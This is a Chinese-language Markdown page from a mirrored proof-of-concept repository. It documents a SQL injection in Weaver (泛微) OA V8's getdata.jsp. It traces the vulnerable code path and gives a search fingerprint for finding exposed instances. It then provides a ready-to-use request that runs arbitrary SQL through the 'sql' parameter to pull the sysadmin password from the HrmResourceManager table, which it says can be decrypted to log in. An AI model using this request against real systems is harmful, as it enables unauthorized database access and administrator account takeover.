admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/泛微OA getdata.jsp SQL注入漏洞.md

56 lines
1.5 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# 泛微OA V8 getdata.jsp SQL注入漏洞
## 漏洞描述
泛微OA V8 存在SQL注入漏洞攻击者可以通过漏洞获取管理员权限和服务器权限
## 漏洞影响
```
泛微OA V8
```
## 网络测绘
```
app="泛微-协同办公OA"
```
## 漏洞复现
在getdata.jsp中直接将request对象交给
**weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :**
方法处理
![image-20220209104257902](images/202202091042978.png)
在getData方法中判断请求里cmd参数是否为空如果不为空调用proc方法
![image-20220209104319947](images/202202091043985.png)
Proc方法4个参数(“空字符串”,”cmd参数值”,request对象serverContext对象)
在proc方法中对cmd参数值进行判断当cmd值等于getSelectAllId时再从请求中获取sql和type两个参数值并将参数传递进getSelectAllIdssql,type方法中
![image-20220209104335191](images/202202091043319.png)
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=select password as id from userinfo;
即可完成对数据库操控
POC
```plain
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
```
查询HrmResourceManager表中的password字段页面中返回了数据库第一条记录的值sysadmin用户的password
![image-20220209104351654](images/202202091043694.png)解密后即可登录系统
![image-20220209104408461](images/202202091044509.png)
Reference in New Issue Copy Permalink